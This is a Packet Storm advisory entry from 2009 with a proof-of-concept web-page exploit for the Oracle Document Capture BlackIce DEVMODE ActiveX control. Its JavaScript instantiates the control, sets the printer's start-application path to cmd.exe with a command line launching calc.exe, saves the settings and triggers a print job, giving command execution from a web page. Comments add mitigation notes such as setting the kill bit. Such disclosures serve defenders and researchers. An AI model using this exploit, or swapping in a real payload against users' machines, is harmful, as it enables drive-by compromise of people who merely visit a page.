Oracle Document Capture BlackIce Command Execution

2009-09-29T00:00:00
ID PACKETSTORM:81716
Type packetstorm
Reporter Nine:Situations:Group::pyrokinesis
Modified 2009-09-29T00:00:00

Description

                                        
                                            `<!-- Oracle Document Capture BlackIce DEVMODE ActiveX Control remote command execution  
  
CLSID: {1503569A-0AE2-4333-B6E6-466AB0BC73E5}  
Progid: BLACKICEDEVMODE.BlackIceDEVMODECtrl.1  
Binary Path: C:\WINDOWS\system32\BlackIceDEVMODE.ocx  
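Safe For Initialization (Registry): True  
Safe For Scripting (Registry): True  
Note: with both flags set, Internet Explorer treats the control as safe to instantiate and script from web content, which is what makes the issue reachable from a remote page. Setting the kill bit for the CLSID above (or unregistering the control) blocks that path.  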
-->  
<script language='javascript'>  
  
// Proof of concept: script in a web page drives the BlackIce DEVMODE control and
// reconfigures the "Oracle Document Capture" printer so that it starts a program.
// The payload here is a harmless marker (cmd.exe launching calc.exe).
// Defender notes:
//  - Root cause is exposure: the header above lists the control as Safe For
//    Scripting / Safe For Initialization, so it can be created from page script.
//  - Mitigation: set the IE kill bit for CLSID {1503569A-0AE2-4333-B6E6-466AB0BC73E5}
//    or unregister BlackIceDEVMODE.ocx where browser use is not needed.
//  - Triage: the settings are written with SaveBlackIceDEVMODE, so presumably they
//    outlive the page; check the printer's start-application path (TODO confirm).

// Instantiate the control by ProgID (Internet Explorer / ActiveXObject only).
var BlackIce = new ActiveXObject("BLACKICEDEVMODE.BlackIceDEVMODECtrl.1");  
  
// Presumably returns a handle to the named printer's DEVMODE settings; every later
// call passes it back. Assigned without var, so it becomes an implicit global.
pBlackIceDEVMODE = BlackIce.LoadBlackIceDEVMODE ("Oracle Document Capture");  
  
// NOTE(review): effect inferred from the method name; confirm in the control's docs.
BlackIce.EnableKeepExistingFiles (pBlackIceDEVMODE);  
// Judging by the names, these turn on the driver's "start application" feature and
// make it run before printing. This feature is the dangerous capability exposed.
BlackIce.EnableStartApplication (pBlackIceDEVMODE);  
BlackIce.EnableStartBeforePrint(pBlackIceDEVMODE);  
// The program to start is an arbitrary caller-supplied path; the control is not
// shown restricting it in any way.
BlackIce.SetApplicationPath("c:\\windows\\system32\\cmd.exe",pBlackIceDEVMODE);  
// Enable parameter passing and supply a caller-controlled command line.
// NOTE(review): the meaning of the (1,6) parameter codes is not shown on this page.
BlackIce.EnablePassParameters(pBlackIceDEVMODE);  
BlackIce.SetStartApplicationParamCode(pBlackIceDEVMODE,1,6);  
BlackIce.SetCustomStartAppParameter(pBlackIceDEVMODE," /c start calc.exe");  
// Write the modified settings back to the named printer.
BlackIce.SaveBlackIceDEVMODE("Oracle Document Capture",pBlackIceDEVMODE);  
// Issue a job-control request to the printer. The author's list below matches the
// Win32 spooler JOB_CONTROL_* values, so the trailing 4 is presumably
// JOB_CONTROL_RESTART. The meaning of the middle argument (1) is not shown; confirm.
BlackIce.ControlJob("Oracle Document Capture",1,4); //JOB_CONTROL_PAUSE 1  
//JOB_CONTROL_RESUME 2  
//JOB_CONTROL_RESTART 4  
//JOB_CONTROL_DELETE 5  
</script>  
  
  
`